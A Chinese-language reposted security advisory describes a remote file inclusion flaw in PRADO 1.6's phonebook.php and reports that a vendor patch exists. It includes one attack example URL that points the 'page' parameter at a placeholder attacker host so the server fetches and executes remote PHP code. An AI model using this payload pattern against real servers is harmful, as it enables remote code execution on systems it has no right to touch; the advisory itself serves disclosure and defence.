 |
PRADO phonebook.php文件包含缺陷允许远程用户执行任意命令 |
|
|
| PRADO phonebook.php文件包含缺陷允许远程用户执行任意命令 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 10:38:41 |
|
安全公告:1012813
公告地址:http://securitytracker.com/id?1012813
更新日期:2005.1.10
首发日期:2005.1.10
漏洞危害:通过网络执行任意代码,敏感信息泄露
漏洞修补:可以
漏洞利用:可以
厂商确认:是
软件版本:1.6
漏洞描述:Paul Brereton在PRADO中发现了一个漏洞。一个远程用户可以在目标 系统上执行任意代码。
'phonebook.php'脚本没有验证用户提供的'page'变量。远程用户可以发送一个精心构造的URL导致在远程服务器包含任意的Php代码,并且在目标系统上执行它们。任意的php代码包刮操作系统的命令,都将以目标服务器上的web服务权限运行。
攻击示例:
http://[target]/examples/phonebook.php?page=http://[attacker]/evilco de.txt%00&filter=P
已经告知厂商。
漏洞影响:远程用户以web服务进程权限在目标系统上执行任意的Php代码,包刮一些操作系统命令。
解决办法:厂商已经发布修补版本。
http://sourceforge.net/project/showfiles.php?group_id=118087
厂商地址:www.xisc.com/
漏洞原因:输入验证错误。
系统平台:任意Unix,Linux及windows版本
漏洞发布:SecuriTeam <support@securiteam.com>
相关记录:无【转自世纪安全网 http://www.21safe.com】
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: 本地连接那里少了验证那项消失了的解决方法
下一篇文章: php-Calendar远程任意命令执行漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
